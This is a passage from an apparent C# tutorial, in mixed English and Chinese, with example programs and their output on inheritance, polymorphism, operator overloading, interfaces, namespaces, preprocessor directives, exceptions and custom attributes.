    成本: 2362.5

Tabletop's Display() overrides Rectangle's Display(); without the base.Display(); statement, Rectangle.Display() would not execute.

Interface Inheritance

An interface can inherit from one or more other interfaces; the derived interface inherits all the members of its base interfaces.

A derived interface can extend the base interface's member list but cannot change the members' access modifiers.

using System;

// define a base interface
interface IBaseInterface
{
void Method1();
}

// define a derived interface that inherits the base interface (interfaces can inherit too)
interface IDerivedInterface : IBaseInterface
{
void Method2();
}

// a class implementing the derived interface (it must implement all members, or compilation fails)
class MyClass : IDerivedInterface
{
public void Method1()
{
Console.WriteLine("Method1 implementation");
}

public void Method2()
{
Console.WriteLine("Method2 implementation");
}
}

class Program
{
static void Main(string[] args)
{
// create an instance of MyClass
MyClass obj = new MyClass();

// call the method inherited from the base interface
obj.Method1();

// call the method added by the derived interface
obj.Method2();
}
}

Interfaces and classes have clear differences and distinct purposes in object-oriented programming:

1. Definition and purpose
  • A class is a concrete data structure that encapsulates data and behavior (i.e. methods). A class can be instantiated into objects, which have the attributes and methods the class defines.
  • An interface is an abstract type that defines a set of methods (and constants) without any code implementing them. An interface defines a protocol or contract: the methods an implementing class must provide.
2. Implementation
  • A class can contain fields, properties, methods, constructors, and other implementation code; it supplies concrete data and behavior.
  • An interface can only declare the signatures of methods, properties, events, and indexers, with no implementation. A class implementing an interface must provide concrete implementations of all its members.
3. Inheritance
  • Classes can inherit from other classes, forming a class hierarchy. A class inherits its parent's fields and methods and can override them or add new ones.
  • Interfaces can be implemented by classes, and one class can implement several interfaces. Interfaces support multiple inheritance among themselves: one interface can inherit several others.
4. Use cases
  • Classes suit describing concrete objects and implementing complex behavior; they can hold state (fields) and behavior (methods).
  • Interfaces suit defining what an object should be able to do without caring about implementation details. Interfaces help establish contracts between classes, making code more modular and extensible.

In summary, a class is a concrete implementation of data and behavior, while an interface is an abstract description of capabilities. Using classes and interfaces judiciously makes code more flexible, maintainable, and extensible.


C# Multiple Inheritance

Multiple inheritance in C++: C++(23)——理解多重继承(菱形继承、半圆形继承)、虚基类和虚继承_c++23-CSDN博客

Multiple inheritance means one class can inherit behavior and features from more than one parent class, as opposed to single inheritance, where a class inherits from only one parent.

C# does not support multiple inheritance. You can, however, use interfaces to achieve it (C# cannot inherit multiple base classes, but it can implement multiple interfaces). The following program demonstrates this:

    using System;
    namespace InheritanceApplication
    {
    class Shape
    {
    public void setWidth(int w)
    {
    width = w;
    }
    public void setHeight(int h)
    {
    height = h;
    }
    protected int width;
    protected int height;
    }

    // 基类 PaintCost
    public interface PaintCost
    {
    int getPaintCost(int area);

    }

    // 基类 FlatCost
    public interface FlatCost
    {
    int getFlatCost(int area);

    }
    // 派生类
    class Rectangle : Shape, PaintCost, FlatCost
    {
    public int getArea()
    {
    return (width * height);
    }
    public int getPaintCost(int area)
    {
    return area * 70;
    }
    public int getFlatCost(int area)
    {
    return area * 20;
    }
    }
    class RectangleTester
    {
    static void Main(string[] args)
    {
    Rectangle Rect = new Rectangle();
    int area;
    Rect.setWidth(5);
    Rect.setHeight(7);
    area = Rect.getArea();
    // 打印对象的面积
    Console.WriteLine("总面积: {0}", Rect.getArea());
    Console.WriteLine("油漆总成本: ${0}", Rect.getPaintCost(area));
    Console.WriteLine("工本费: ${0}", Rect.getFlatCost(area));
    Console.ReadKey();
    }
    }
    }
    总面积: 35
    油漆总成本: $2450
    工本费: $700

C# Polymorphism

Polymorphism is the ability of one behavior to take multiple different forms.

Polymorphism means "many forms." In the object-oriented paradigm it often appears as "one interface, multiple functions."

Polymorphism can be static or dynamic. In static polymorphism the function's response is determined at compile time; in dynamic polymorphism it is determined at run time.

In C#, every type is polymorphic, because all types, including user-defined ones, inherit from Object.

A real-world example: pressing the F1 key:

• in Flash, the AS 3 help document pops up;

• in Word, Word Help pops up;

• in Windows, Windows Help and Support pops up.

  The same event on different objects produces different results. (That's polymorphism!)

Static polymorphism

The mechanism that links a function with an object at compile time is called early binding, or static binding. C# provides two techniques for static polymorphism:

• Function overloading
• Operator overloading
Function overloading

You can have multiple definitions of the same function name in the same scope. The definitions must differ from one another, in the types of the parameters or in their number (in short, in the parameter signature). You cannot overload function declarations that differ only in return type.

    using System;
    namespace PolymorphismApplication
    {
    public class TestData
    {
    public int Add(int a, int b, int c)
    {
    return a + b + c;
    }
    public int Add(int a, int b)
    {
    return a + b;
    }
    }
    class Program
    {
    static void Main(string[] args)
    {
    TestData dataClass = new TestData();
    int add1 = dataClass.Add(1, 2);
    int add2 = dataClass.Add(1, 2, 3);

    Console.WriteLine("add1 :" + add1);
    Console.WriteLine("add2 :" + add2);
    }
    }
    }

    动态多态性

    ​静态多态性(Static Polymorphism)和动态多态性(Dynamic Polymorphism)是面向对象编程中多态性的两种实现方式,它们之间的主要区别在于如何确定调用的具体方法或函数。

    1. 静态多态性(编译时多态性)
      • 静态多态性是在编译时确定方法的调用,根据编译时的类型信息来决定具体调用哪个方法。
      • 主要实现方式是函数重载(Overloading)和运算符重载(Operator Overloading)。在函数重载中,编译器根据调用时使用的参数类型或数量来选择正确的函数版本。
      • 静态多态性的优势在于效率高,因为在编译时已经确定了调用的具体方法,无需在运行时进行额外的查找或判断。
    2. 动态多态性(运行时多态性)
      • 动态多态性是在运行时根据对象的实际类型来确定方法的调用。
      • 主要实现方式是通过继承和方法重写(Override),以及接口和虚方法的实现。通过继承,子类可以重写父类的方法,在程序运行时根据对象的实际类型调用正确的方法版本。
      • 动态多态性的优势在于灵活性和扩展性,因为它允许在运行时根据实际情况来决定方法的调用,从而支持更加复杂和动态的程序逻辑。

​C# 允许您使用关键字 abstract 创建抽象类,用于提供一个类的部分实现。当派生类继承该抽象类并实现其抽象方法时,实现才算完成。抽象类可以包含抽象方法,抽象方法由派生类实现,从而让派生类具有更专门的功能。

    ​请注意,下面是有关抽象类的一些规则:

    • 您不能创建一个抽象类的实例。
    • 您不能在一个抽象类外部声明一个抽象方法。
    • 通过在类定义前面放置关键字 sealed,可以将类声明为密封类。当一个类被声明为 sealed 时,它不能被继承。抽象类不能被声明为 sealed。

    ​在 C# 中,抽象类(abstract class)和接口(interface)是两种用于实现多态性的重要机制,它们有几个关键的区别:

    1. 定义和用途:
      • 抽象类: 是一个类,可以包含抽象方法(没有实现的方法)和具体方法(有实现的方法)。抽象类不能被实例化,只能被继承。子类必须实现(重写)抽象类中的所有抽象方法,除非子类也声明为抽象类。抽象类可以包含字段、属性、构造函数等。
      • 接口: 是一种引用类型,定义了一个类或结构体必须遵循的一组方法和属性的契约。接口只能包含方法、属性、事件和索引器的声明,且不能包含任何实现。类通过实现接口来保证其提供了接口定义的所有成员。
    2. 多继承:
      • 抽象类: C# 中不支持多继承,一个类只能继承自一个抽象类(或具体类)。抽象类本身可以实现多个接口。
      • 接口: 支持多重继承,一个类可以实现多个接口。这使得接口在定义类的行为时更加灵活。
    3. 成员实现:
      • 抽象类: 可以包含方法的实现,子类可以选择性地重写这些方法。
      • 接口: 不能包含方法的实现,只能定义方法的签名。
4. 字段和常量:
  • 抽象类: 可以包含字段(字段可以是私有的、受保护的等),也可以包含常量字段。
  • 接口: 不能包含实例字段。(传统 C# 中接口也不能声明常量,直到 C# 8.0 才允许接口包含静态成员。)
    5. 设计层次:
      • 抽象类: 通常用于描述一种“是什么”的关系,即表示一种基本的类型或概念,并且希望子类扩展其功能。
      • 接口: 通常用于描述一种“能做什么”的能力,即规定了一组行为或功能,类通过实现接口来表明自己具有这些能力。
    using System;
    namespace PolymorphismApplication
    {
    abstract class Shape
    {
    abstract public int area(); // 标记为 abstract 的函数只可声明,不可定义实现
    }

    class Rectangle : Shape
    {
    private int length;
    private int width;
    public Rectangle(int a = 0, int b = 0)
    {
    length = a;
    width = b;
    }
    public override int area() // 若要实现继承所定义的函数,使用 override 标记
    {
    Console.WriteLine("Rectangle 类的面积:");
    return (width * length);
    }
    }

    class RectangleTester
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle(10, 7);
    double a = r.area();
    Console.WriteLine("面积: {0}", a);
    Console.ReadKey();
    }
    }
    }
    Rectangle 类的面积:
    面积: 70

    ​当有一个定义在类中的函数需要在继承类中实现时,可以使用虚方法(与 abstract 相比,virtual 可以在基类中定义实现)。

    • 虚方法是使用关键字 virtual 声明的。

    • 虚方法可以在不同的继承类中有不同的实现。

    • 对虚方法的调用是在运行时发生的。

• 动态多态性是通过抽象类和虚方法实现的。

​以下实例创建了 Shape 基类,并创建派生类 Circle、Rectangle、Triangle。Shape 类提供一个名为 Draw 的虚方法,每个派生类重写该方法以绘制各自的形状。

    using System;
    using System.Collections.Generic;

    public abstract class Shape
    {
    public int X { get; private set; }
    public int Y { get; private set; }
    public int Height { get; set; }
    public int Width { get; set; }

    // 虚方法
    public virtual void Draw()
    {
    Console.WriteLine("执行基类的画图任务");
    }
    }

    class Circle : Shape
    {
    public override void Draw() // 同样使用 override
    {
    Console.WriteLine("画一个圆形");
    base.Draw();
    }
    }
    class Rectangle : Shape
    {
    public override void Draw()
    {
    Console.WriteLine("画一个长方形");
    base.Draw();
    }
    }
    class Triangle : Shape
    {
    public override void Draw()
    {
    Console.WriteLine("画一个三角形");
    base.Draw();
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    // 创建一个 List<Shape> 对象,并向该对象添加 Circle、Triangle 和 Rectangle
    var shapes = new List<Shape>
    {
    new Rectangle(),
    new Triangle(),
    new Circle()
    };

    // 使用 foreach 循环对该列表的派生类进行循环访问,并对其中的每个 Shape 对象调用 Draw 方法
    foreach (var shape in shapes)
    {
    shape.Draw();
    }

    Console.WriteLine("按下任意键退出。");
    Console.ReadKey();
    }

    }
    画一个长方形
    执行基类的画图任务
    画一个三角形
    执行基类的画图任务
    画一个圆形
    执行基类的画图任务
    按下任意键退出。

    ​下面的程序演示通过虚方法 area() 来计算不同形状图像的面积(同样的语句,底层执行不同的代码):

    using System;
    namespace PolymorphismApplication
    {
    class Shape
    {
    protected int width, height;
    public Shape( int a=0, int b=0)
    {
    width = a;
    height = b;
    }
    public virtual int area()
    {
    Console.WriteLine("父类的面积:");
    return 0;
    }
    }
    class Rectangle: Shape
    {
    public Rectangle( int a=0, int b=0): base(a, b)
    {

    }
    public override int area ()
    {
    Console.WriteLine("Rectangle 类的面积:");
    return (width * height);
    }
    }
    class Triangle: Shape
    {
    public Triangle(int a = 0, int b = 0): base(a, b)
    {

    }
    public override int area()
    {
    Console.WriteLine("Triangle 类的面积:");
    return (width * height / 2);
    }
    }
    class Caller
    {
    public void CallArea(Shape sh)
    {
    int a;
    a = sh.area();
    Console.WriteLine("面积: {0}", a);
    }
    }
    class Tester
    {

    static void Main(string[] args)
    {
    Caller c = new Caller();
    Rectangle r = new Rectangle(10, 7);
    Triangle t = new Triangle(10, 5);
    c.CallArea(r);
    c.CallArea(t);
    Console.ReadKey();
    }
    }
    }
    Rectangle 类的面积:
    面积: 70
    Triangle 类的面积:
    面积: 25

    C# 运算符重载

    您可以重定义或重载 C# 中内置的运算符。因此,程序员也可以使用用户自定义类型的运算符。重载运算符是具有特殊名称的函数,是通过关键字 operator 后跟运算符的符号来定义的。与其他函数一样,重载运算符有返回类型和参数列表。

    运算符重载的实现

    using System;

    namespace OperatorOvlApplication
    {
    class Box
    {
    private double length; // 长度
    private double breadth; // 宽度
    private double height; // 高度

    public double getVolume()
    {
    return length * breadth * height;
    }
    public void setLength( double len )
    {
    length = len;
    }

    public void setBreadth( double bre )
    {
    breadth = bre;
    }

    public void setHeight( double hei )
    {
    height = hei;
    }
    // 重载 + 运算符来把两个 Box 对象相加
    public static Box operator+ (Box b, Box c)
    {
    Box box = new Box();
    box.length = b.length + c.length;
    box.breadth = b.breadth + c.breadth;
    box.height = b.height + c.height;
    return box;
    }

    }

    class Tester
    {
    static void Main(string[] args)
    {
    Box Box1 = new Box(); // 声明 Box1,类型为 Box
    Box Box2 = new Box(); // 声明 Box2,类型为 Box
    Box Box3 = new Box(); // 声明 Box3,类型为 Box
    double volume = 0.0; // 体积

    // Box1 详述
    Box1.setLength(6.0);
    Box1.setBreadth(7.0);
    Box1.setHeight(5.0);

    // Box2 详述
    Box2.setLength(12.0);
    Box2.setBreadth(13.0);
    Box2.setHeight(10.0);

    // Box1 的体积
    volume = Box1.getVolume();
    Console.WriteLine("Box1 的体积: {0}", volume);

    // Box2 的体积
    volume = Box2.getVolume();
    Console.WriteLine("Box2 的体积: {0}", volume);

    // 把两个对象相加
    Box3 = Box1 + Box2;

    // Box3 的体积
    volume = Box3.getVolume();
    Console.WriteLine("Box3 的体积: {0}", volume);
    Console.ReadKey();
    }
    }
    }
    Box1 的体积: 210
    Box2 的体积: 1560
    Box3 的体积: 5400

    可重载和不可重载运算符

• +, -, !, ~, ++, --:这些一元运算符只有一个操作数,可以被重载。
• +, -, *, /, %:这些二元运算符带有两个操作数,可以被重载。
• ==, !=, <, >, <=, >=:这些比较运算符可以被重载,但必须成对重载(见下面的示意)。
• &&, ||:这些条件逻辑运算符不能被直接重载。
• +=, -=, *=, /=, %=:这些赋值运算符不能被重载(重载对应的二元运算符后,复合赋值会自动使用它)。
• =, ., ?:, ->, new, is, sizeof, typeof:这些运算符不能被重载。
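
​下面给出比较运算符成对重载的一个简化示意(这里的 Box 只保留一个 Length 字段,是为演示假设的写法,并非前文示例的原样延续)。重载 == 时,通常还应同时重写 Equals 和 GetHashCode:

    using System;

    class Box
    {
        public double Length;
        public Box(double len) { Length = len; }

        // == 与 != 必须成对重载
        public static bool operator ==(Box a, Box b)
        {
            if (ReferenceEquals(a, b)) return true;
            if (ReferenceEquals(a, null) || ReferenceEquals(b, null)) return false;
            return a.Length == b.Length;
        }
        public static bool operator !=(Box a, Box b)
        {
            return !(a == b);
        }

        // 重载 == 时建议同时重写 Equals 和 GetHashCode
        public override bool Equals(object obj)
        {
            Box other = obj as Box;
            return !ReferenceEquals(other, null) && Length == other.Length;
        }
        public override int GetHashCode()
        {
            return Length.GetHashCode();
        }
    }

    class Tester
    {
        static void Main()
        {
            Console.WriteLine(new Box(2.0) == new Box(2.0)); // True
            Console.WriteLine(new Box(2.0) != new Box(3.0)); // True
        }
    }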

    C# 接口(Interface)

    • 接口定义了所有类继承接口时应遵循的语法合同。接口定义了语法合同 “是什么” 部分,派生类定义了语法合同 “怎么做” 部分。

• 接口定义了属性、方法和事件,这些都是接口的成员。接口只包含成员的声明,成员的定义是派生类的责任。接口提供了派生类应遵循的标准结构。

    • 接口使得实现接口的类或结构在形式上保持一致。

• 抽象类在某种程度上与接口类似,不过它大多用在只有少数方法由基类声明、而由派生类实现的场景。

    • 接口本身并不实现任何功能,它只是和声明实现该接口的对象订立一个必须实现哪些行为的契约。

    • 抽象类不能直接实例化,但允许派生出具体的,具有实际功能的类。


​接口使用 interface 关键字声明,它与类的声明类似。接口声明默认是 public 的。下面是一个接口声明的实例,它定义了接口 IMyInterface。通常接口命名以字母 I 开头,这个接口只有一个方法 MethodToImplement(),没有参数和返回值,当然我们也可以按照需求设置参数和返回值。

​值得注意的是,该方法并没有具体的实现,实现由 InterfaceImplementer 类提供。

    using System;

    interface IMyInterface
    {
    // 接口成员
    void MethodToImplement();
    }

    class InterfaceImplementer : IMyInterface
    {
    static void Main()
    {
    InterfaceImplementer iImp = new InterfaceImplementer();
    iImp.MethodToImplement();
    }

    public void MethodToImplement()
    {
    Console.WriteLine("MethodToImplement() called.");
    }
    }
    MethodToImplement() called.

​以下实例定义了两个接口:IMyInterface 和 IParentInterface。

​(接口可以继承其他接口)如果一个接口继承了其他接口,那么实现类或结构就需要实现所有这些接口的成员。

​实例中 IMyInterface 继承了 IParentInterface 接口,因此实现类必须同时实现 MethodToImplement() 和 ParentInterfaceMethod() 方法:

    using System;

    interface IParentInterface
    {
    void ParentInterfaceMethod();
    }

    interface IMyInterface : IParentInterface
    {
    void MethodToImplement();
    }

    class InterfaceImplementer : IMyInterface
    {
    static void Main()
    {
    InterfaceImplementer iImp = new InterfaceImplementer();
    iImp.MethodToImplement();
    iImp.ParentInterfaceMethod();
    }

    public void MethodToImplement()
    {
    Console.WriteLine("MethodToImplement() called.");
    }

    public void ParentInterfaceMethod()
    {
    Console.WriteLine("ParentInterfaceMethod() called.");
    }
    }
    MethodToImplement() called.
    ParentInterfaceMethod() called.

    C# 命名空间(Namespace)

命名空间的设计目的是提供一种让一组名称与其他名称分隔开的方式:在一个命名空间中声明的类,不会与另一个命名空间中声明的同名类冲突。

    ​我们举一个计算机系统中的例子,一个文件夹(目录)中可以包含多个文件夹,每个文件夹中不能有相同的文件名,但不同文件夹中的文件可以重名。

    定义命名空间
    using System;

    namespace first_space
    {
    class namespace_cl
    {
    public void func()
    {
    Console.WriteLine("Inside first_space");
    }
    }
    }
    namespace second_space
    {
    class namespace_cl
    {
    public void func()
    {
    Console.WriteLine("Inside second_space");
    }
    }
    }
    class TestClass
    {
    static void Main(string[] args)
    {
    first_space.namespace_cl fc = new first_space.namespace_cl();
    second_space.namespace_cl sc = new second_space.namespace_cl();
    fc.func();
    sc.func();
    Console.ReadKey();
    }
    }
    Inside first_space
    Inside second_space
    using 关键字

    using 关键字表明程序使用的是给定命名空间中的名称。例如,我们在程序中使用 System 命名空间,其中定义了类 Console。我们可以只写:

    Console.WriteLine ("Hello there");

    ​我们可以写完全限定名称,如下:

    System.Console.WriteLine("Hello there");

​您也可以使用 using 命名空间指令,这样在使用的时候就不用在前面加上命名空间名称(类似于 C++ 里的 using namespace std;)。

    using System;
    using first_space;
    using second_space;

    namespace first_space
    {
    class abc
    {
    public void func()
    {
    Console.WriteLine("Inside first_space");
    }
    }
    }
    namespace second_space
    {
    class efg
    {
    public void func()
    {
    Console.WriteLine("Inside second_space");
    }
    }
    }
    class TestClass
    {
    static void Main(string[] args)
    {
    abc fc = new abc();
    efg sc = new efg();
    fc.func();
    sc.func();
    Console.ReadKey();
    }
    }
    Inside first_space
    Inside second_space
    嵌套命名空间

    ​命名空间可以被嵌套,即您可以在一个命名空间内定义另一个命名空间,如下所示:

    using System;
    using SomeNameSpace;
    using SomeNameSpace.Nested;

    namespace SomeNameSpace
    {
    public class MyClass
    {
    static void Main()
    {
    Console.WriteLine("In SomeNameSpace");
    Nested.NestedNameSpaceClass.SayHello();
    }
    }

    // 内嵌命名空间
    namespace Nested
    {
    public class NestedNameSpaceClass
    {
    public static void SayHello()
    {
    Console.WriteLine("In Nested");
    }
    }
    }
    }

    C# 预处理器指令

    预处理器指令(Preprocessor Directives)指导编译器在实际编译开始之前对信息进行预处理

    ​通过这些指令,可以控制编译器如何编译文件或编译哪些部分。常见的预处理器指令包括条件编译、宏定义等。

    ​所有的预处理器指令都是以 # 开始,且在一行上,只有空白字符可以出现在预处理器指令之前。

    ​预处理器指令不是语句,所以它们不以分号 ; 结束。

    ​C# 编译器没有一个单独的预处理器,但是,指令被处理时就像是有一个单独的预处理器一样。在 C# 中,预处理器指令用于在条件编译中起作用。与 C 和 C++ 不同的是,它们不是用来创建宏。一个预处理器指令必须是该行上的唯一指令。

    C# 预处理器指令列表

    ​下表列出了 C# 中可用的预处理器指令:

• #define:定义一个符号,可以用于条件编译。
• #undef:取消定义一个符号。
• #if:开始一个条件编译块,如果符号被定义则包含代码块。
• #elif:如果前面的 #if 或 #elif 条件不满足,且当前条件满足,则包含代码块。
• #else:如果前面的 #if 或 #elif 条件不满足,则包含代码块。
• #endif:结束一个条件编译块。
• #warning:生成编译器警告信息。
• #error:生成编译器错误信息。
• #region:标记一段代码区域,可以在 IDE 中折叠和展开这段代码,便于代码的组织和阅读。
• #endregion:结束一个代码区域。
• #line:更改编译器输出中的行号和文件名,可用于调试或代码生成工具。
• #pragma:用于给编译器发送特殊指令,例如禁用或恢复特定的警告。
• #nullable:控制可空性上下文和注释,允许启用或禁用对可空引用类型的编译器检查。

    #define 和 #undef 预处理器

    #define 用于定义符号(通常用于条件编译),#undef 用于取消定义符号。

    #define DEBUG

    #undef RELEASE

    ​#define 允许您定义一个符号,这样,通过使用符号作为传递给 #if 指令的表达式,表达式将返回 true。它的语法如下:

    #define PI 
    using System;
    namespace PreprocessorDAppl
    {
    class Program
    {
    static void Main(string[] args)
    {
    #if (PI)
    Console.WriteLine("PI is defined");
    #else
    Console.WriteLine("PI is not defined");
    #endif
    Console.ReadKey();
    }
    }
    }
    PI is defined

    条件指令:#if, #elif, #else 和 #endif

    ​您可以使用 #if 指令来创建一个条件指令。

    ​条件指令用于测试符号是否为真。如果为真,编译器会执行 #if 和下一个指令之间的代码。

    ​条件指令的语法:

    #define DEBUG
    #define VC_V10
    using System;
    public class TestClass
    {
    public static void Main()
    {

    #if (DEBUG && !VC_V10)
    Console.WriteLine("DEBUG is defined");
    #elif (!DEBUG && VC_V10)
    Console.WriteLine("VC_V10 is defined");
    #elif (DEBUG && VC_V10)
    Console.WriteLine("DEBUG and VC_V10 are defined");
    #else
    Console.WriteLine("DEBUG and VC_V10 are not defined");
    #endif
    Console.ReadKey();
    }
    }
    DEBUG and VC_V10 are defined

    #pragma

    ​用于向编译器发送特殊指令。最常见的用法是禁用特定的警告。

    #pragma warning disable 414
    private int unusedVariable;
    #pragma warning restore 414

    使用预处理器指令的注意事项

    • 提高代码可读性:使用 #region 可以帮助分隔代码块,提高代码的组织性。
    • 条件编译:通过 #if 等指令可以在开发和生产环境中编译不同的代码,方便调试和发布。
• 警告和错误:通过 #warning 和 #error 可以在编译时提示开发人员注意特定问题。

    ​通过正确使用这些预处理器指令,可以更好地控制代码的编译过程,提高代码的灵活性和可维护性。
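
​下面把 #region、#warning 和条件编译组合成一个小示意(其中符号 TRIAL_VERSION 是假设的示例名):

    #define TRIAL_VERSION
    using System;

    class Demo
    {
        #region 初始化代码(可在 IDE 中折叠)
        static void Init()
        {
            Console.WriteLine("init");
        }
        #endregion

        static void Main()
        {
    #if TRIAL_VERSION
    #warning 当前正在编译试用版(该警告会出现在编译输出中)
            Console.WriteLine("Trial build");
    #endif
            Init();
        }
    }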

    C# 正则表达式

    ​其实我觉得可以用 ChatGPT 帮自己写正则表达式。

    using System;
    using System.Text.RegularExpressions;

    public class Example
    {
    public static void Main()
    {
    string input = "1851 1999 1950 1905 2003";
    string pattern = @"(?<=19)\d{2}\b";

    foreach (Match match in Regex.Matches(input, pattern))
    Console.WriteLine(match.Value);
    }
    }
    99
    50
    05
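
​除了 Regex.Matches,Regex 类还提供 IsMatch(判断是否存在匹配)和 Replace(按模式替换)等常用方法。下面是一个小示意:

    using System;
    using System.Text.RegularExpressions;

    public class RegexDemo
    {
        public static void Main()
        {
            string input = "Hello   World, 2024!";

            // IsMatch:判断输入中是否含有数字
            Console.WriteLine(Regex.IsMatch(input, @"\d+")); // True

            // Replace:把连续空白压缩为单个空格
            Console.WriteLine(Regex.Replace(input, @"\s+", " ")); // Hello World, 2024!
        }
    }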

    C# 异常处理

    ​异常是在程序执行期间出现的问题。C# 中的异常是对程序运行时出现的特殊情况的一种响应,比如尝试除以零。

​异常提供了一种把程序控制权从某个部分转移到另一个部分的方式。C# 的异常处理是建立在四个关键字之上的:try、catch、finally 和 throw。

• try:try 块标识一段可能抛出异常的代码,后面跟一个或多个 catch 块。
• catch:程序通过异常处理程序捕获异常。catch 关键字表示异常的捕获。
• finally:finally 块用于执行给定的语句,不管异常是否被抛出都会执行。例如,如果您打开一个文件,不管是否出现异常,文件都要被关闭。
• throw:当问题出现时,程序抛出一个异常,使用 throw 关键字来完成。

    C# 中的异常类

​C# 异常是使用类来表示的。C# 中的异常类主要直接或间接地派生于 System.Exception 类。System.ApplicationException 和 System.SystemException 是派生于 System.Exception 的异常类。

• System.ApplicationException 类支持由应用程序生成的异常。早期的指导建议自定义异常派生自该类,但现在微软官方文档更建议自定义异常直接派生自 System.Exception。

    • System.SystemException 类是所有预定义的系统异常的基类。

    ​下表列出了一些派生自 System.SystemException 类的预定义的异常类:

• System.IO.IOException:处理 I/O 错误。
• System.IndexOutOfRangeException:处理当方法指向超出范围的数组索引时生成的错误。
• System.ArrayTypeMismatchException:处理当数组类型不匹配时生成的错误。
• System.NullReferenceException:处理当引用一个空对象时生成的错误。
• System.DivideByZeroException:处理当除以零时生成的错误。
• System.InvalidCastException:处理在类型转换期间生成的错误。
• System.OutOfMemoryException:处理空闲内存不足生成的错误。
• System.StackOverflowException:处理栈溢出生成的错误。

    异常处理

    ​C# 以 try 和 catch 块的形式提供了一种结构化的异常处理方案。使用这些块,把核心程序语句与错误处理语句分离开。

    ​这些错误处理块是使用 trycatch(若发生异常,执行)和 finally(无论是否有异常,均执行)关键字实现的。下面是一个当除以零时抛出异常的实例:

    using System;
    namespace ErrorHandlingApplication
    {
    class DivNumbers
    {
    int result;
    DivNumbers()
    {
    result = 0;
    }
    public void division(int num1, int num2)
    {
    try
    {
    result = num1 / num2;
    }
    catch (DivideByZeroException e)
    {
    Console.WriteLine("Exception caught: {0}", e);
    }
    finally
    {
    Console.WriteLine("Result: {0}", result);
    }

    }
    static void Main(string[] args)
    {
    DivNumbers d = new DivNumbers();
    d.division(25, 0);
    d.division(25, 5);
    Console.ReadKey();
    }
    }
    }
    Exception caught: System.DivideByZeroException: 尝试除以零。
    在 ErrorHandlingApplication.DivNumbers.division(Int32 num1, Int32 num2) 位置 XXX.cs:行号 15
    Result: 0
    Result: 5
    创建用户自定义异常

​您也可以定义自己的异常。下面的实例中,用户自定义的异常类派生自 ApplicationException 类(如前所述,新代码更推荐直接派生自 Exception),并使用 throw 抛出:

    using System;
    namespace UserDefinedException
    {
    class TestTemperature
    {
    static void Main(string[] args)
    {
    Temperature temp = new Temperature();
    try
    {
    temp.showTemp();
    }
    catch (TempIsZeroException e)
    {
    Console.WriteLine("TempIsZeroException: {0}", e.Message);
    }
    Console.ReadKey();
    }
    }
    }
    public class TempIsZeroException : ApplicationException
    {
    public TempIsZeroException(string message) : base(message)
    {
    }
    }
    public class Temperature
    {
    int temperature = 0;
    public void showTemp()
    {
    if (temperature == 0)
    {
    throw (new TempIsZeroException("Zero Temperature found"));
    }
    else
    {
    Console.WriteLine("Temperature: {0}", temperature);
    }
    }
    }
    TempIsZeroException: Zero Temperature found
    抛出对象

​如果异常是直接或间接派生自 System.Exception 类,您可以抛出一个异常对象。您可以在 catch 块中使用 throw 语句重新抛出当前的异常,如下所示:

    catch (Exception e)
    {
    ...
    throw;
    }

​注意:throw; 会保留原始的调用栈信息,而 throw e; 会重置栈跟踪,因此重新抛出异常时通常首选 throw;。

    C# 文件的输入与输出

​一个文件是一个存储在磁盘中、带有指定名称和目录路径的数据集合。当打开文件进行读写时,它变成一个流(stream)。

​从根本上说,流是通过通信路径传递的字节序列。有两个主要的流:输入流和输出流。输入流用于从文件读取数据(读操作),输出流用于向文件写入数据(写操作)。

    FileStream 类

    System.IO 命名空间中的 FileStream 类有助于文件的读写与关闭。该类派生自抽象类 Stream。

    ​您需要创建一个 FileStream 对象来创建一个新的文件,或打开一个已有的文件。


    ​具体地问 ChatGPT 吧……
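
​这里还是补一个最小的 FileStream 读写示意(文件名 test.dat 是假设的示例路径;实际开发中也常用 File.ReadAllText、StreamReader 等更高层的封装):

    using System;
    using System.IO;

    class FileStreamDemo
    {
        static void Main()
        {
            // 创建(或覆盖)文件并写入若干字节
            using (FileStream fs = new FileStream("test.dat", FileMode.Create, FileAccess.Write))
            {
                for (byte i = 0; i < 10; i++)
                    fs.WriteByte(i);
            }

            // 重新打开文件并逐字节读出,ReadByte 在文件末尾返回 -1
            using (FileStream fs = new FileStream("test.dat", FileMode.Open, FileAccess.Read))
            {
                int b;
                while ((b = fs.ReadByte()) != -1)
                    Console.Write(b + " ");
            }
            Console.WriteLine();
        }
    }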

    高级语法

    C# 特性

    ​Unity 里比较常用。

​特性(Attribute)是用于在运行时传递程序中各种元素(比如类、方法、结构、枚举、组件等)的行为信息的声明性标签。您可以通过使用特性向程序添加声明性信息。一个声明性标签是通过放置在它所应用的元素前面的方括号([ ])来描述的。

    ​特性(Attribute)用于添加元数据,如编译器指令和注释、描述、方法、类等其他信息。.Net 框架提供了两种类型的特性:预定义特性和自定义特性。

    预定义特性(Attribute)

    ​.Net 框架提供了三种预定义特性:

    • AttributeUsage

      • 预定义特性 AttributeUsage 描述了如何使用一个自定义特性类。它规定了特性可应用到的项目的类型。
    • Conditional

      • 这个预定义特性标记了一个条件方法,其执行依赖于指定的预处理标识符。

    它会引起方法调用的条件编译,取决于指定的符号,比如 Debug 或 Trace。例如,常用于在调试代码时显示变量的值。

    • Obsolete

  • 这个预定义特性标记了不应被使用的程序实体。它可以让您通知编译器丢弃某个特定的目标元素。例如,当一个类中有了新方法、但您仍想保留旧方法时,可以把旧方法标记为 obsolete(过时的),并通过一条消息提示应该使用新方法。

    创建自定义特性(Attribute)

    ​一个新的自定义特性应派生自 System.Attribute 类。

    // 一个自定义特性 BugFix 被赋给类及其成员
    using System;

    [AttributeUsage(AttributeTargets.Class |
    AttributeTargets.Constructor |
    AttributeTargets.Field |
    AttributeTargets.Method |
    AttributeTargets.Property,
    AllowMultiple = true)]

    public class DeBugInfo : System.Attribute
    {
    private int bugNo;
    private string developer;
    private string lastReview;
    public string message;

    public DeBugInfo(int bg, string dev, string d)
    {
    this.bugNo = bg;
    this.developer = dev;
    this.lastReview = d;
    }

    public int BugNo
    {
    get
    {
    return bugNo;
    }
    }
    public string Developer
    {
    get
    {
    return developer;
    }
    }
    public string LastReview
    {
    get
    {
    return lastReview;
    }
    }
    public string Message
    {
    get
    {
    return message;
    }
    set
    {
    message = value;
    }
    }
    }

    [DeBugInfo(45, "Zara Ali", "12/8/2012", Message = "Return type mismatch")]
    [DeBugInfo(49, "Nuha Ali", "10/10/2012", Message = "Unused variable")]
    class Rectangle
    {
    // 成员变量
    protected double length;
    protected double width;
    public Rectangle(double l, double w)
    {
    length = l;
    width = w;
    }
    [DeBugInfo(55, "Zara Ali", "19/10/2012",
